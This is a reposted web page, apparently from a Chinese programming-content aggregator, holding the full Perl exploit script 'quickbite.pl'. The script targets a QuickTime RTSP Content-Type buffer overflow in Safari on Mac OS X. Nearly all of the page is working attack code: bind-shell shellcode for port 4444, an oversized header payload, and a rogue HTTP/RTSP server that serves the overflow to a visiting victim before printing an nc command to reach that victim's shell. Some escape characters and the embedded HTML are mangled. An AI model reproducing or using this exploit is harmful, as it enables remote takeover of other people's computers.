欢迎来到福编程网,本站提供各种互联网专业知识!

Safari Quicktime

发布时间:1970-01-01 作者:佚名 来源:互联网
#!/usr/bin/perl##quickbite.pl##SafariQuicktime<=7.3RTSPContent-Typeoverflowexploit#forMacOSX(Intel)##TestedwithOSX10.4.#Onvictim,browsetohttp://server:8080/#Bindsshellonport4444.
#!/usr/bin/perl

#

# quickbite.pl

#

# Safari Quicktime <= 7.3 RTSP Content-Type overflow exploit

# for Mac OS X (Intel)

#

# Tested with OS X 10.4.

# On victim, browse to http://server:8080/

# Binds shell on port 4444.

#

# by krafty

#

# greets to sk, halvar, grugq, and all the ethnical hackers

# extra thanks to ddz for osx hackery

# sec-con greets to secwest, blackhat, hitb, hacklu, itu, xcon, syscan, poc

# sux to exploit traders - ZDI, WabiSabiLabi, and all you h0arders.

# milw0rm and packetstorm rule

# Bring back the days of technotronic and r00tshell! Freedom.

#

# Why is this exploit called "Quickbite"? Here's a dumb Apple joke:

# "What's worse than biting into an apple and finding a worm?"

# "Finding half a worm".

use Socket;

use IO::Handle;

use constant MY_HTTP_PORT => 8080;

$shellcode = "%uc031%u6850%u02ff%u5c11%ue789%u6a50%u6a01%u6a02%ub010%ucd61%u5780%u5050%u686a%ucd58%u8980%uec47%u6ab0%u80cd%u1eb0%u80cd%u5050%u5a6a%ucd58%uff80%ue44f%uf679%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5053%u3bb0%u80cd";

$buf = chr(0x11) x 6000;

# don't touch anything below this line

$html = <

ENDHTML

$rtsp_body =

"v=0rn" .

"o=- 16689332712 1 IN IP4 0.0.0.0rn" .

"s=MPEG-1 or 2 Audiorn" .

"i=1.mp3rn" .

"t=0 0rn" .

"a=tool:hellorn" .

"a=type:broadcastrn" .

"a=control:*rn" .

"a=range:npt=0-213.077rn" .

"a=x-qt-text-nam:MPEG-1 or 2 Audiorn" .

"a=x-qt-text-inf:1.mp3rn" .

"m=audio 0 RTP/AVP 14rn" .

"c=IN IP4 0.0.0.0rn" .

"a=control:track1rn";

$content_length = length($rtsp_body);

$rtsp_header =

"RTSP/1.0 200 OKrn" .

"CSeq: 1rn" .

"Date: 0x00 :Prn" .

"Content-Base: rtsp://0.0.0.0/x.mp3/rn" .

"Content-Type: $bufrn" .

"Content-Length: $content_lengthrnrn";

$rtsp = $rtsp_header . $rtsp_body;

$http_header = "HTTP/1.1 200 OKnContent-type: text/htmlnn";

$| = 1;

my $port = MY_HTTP_PORT;

my $protocol = getprotobyname('tcp');

socket(SOCK, AF_INET, SOCK_STREAM, $protocol) or die "socket() failed: $!";

setsockopt(SOCK,SOL_SOCKET,SO_REUSEADDR,1) or die "Can't set SO_REUSEADDR: $!";

my $my_addr = sockaddr_in($port,INADDR_ANY);

bind(SOCK,$my_addr) or die "bind() failed: $!";

listen(SOCK,SOMAXCONN) or die "listen() failed: $!";

warn "waiting for incoming connections on port $port...n";

$repeat = 1;

$victim = inet_aton("0.0.0.0");

while($repeat) {

next unless my $remote_addr = accept(SESSION,SOCK);

my ($port,$hisaddr) = sockaddr_in($remote_addr);

warn "Connection from [",inet_ntoa($hisaddr),",$port]n";

$victim = $hisaddr;

SESSION->autoflush(1);

$request = "";

while() {

$request_line = $_;

$request .= $request_line;

chomp($request_line);

if($request_line =~ /DESCRIBE rtsp/) {

$repeat = 0;

}

$x = length($request_line);

if($x <= 1) {

last;

}

}

print STDERR $request;

if($repeat) {

print SESSION $http_header . $html;

}

else {

print SESSION $rtsp;

}

warn "Connection from [",inet_ntoa($hisaddr),",$port] finishedn";

close SESSION;

}

print "Connect to ".inet_ntoa($victim).":4444 after 5 secondsn";

print "nc -nvv ".inet_ntoa($victim)." 4444nEnjoy!n";

相关推荐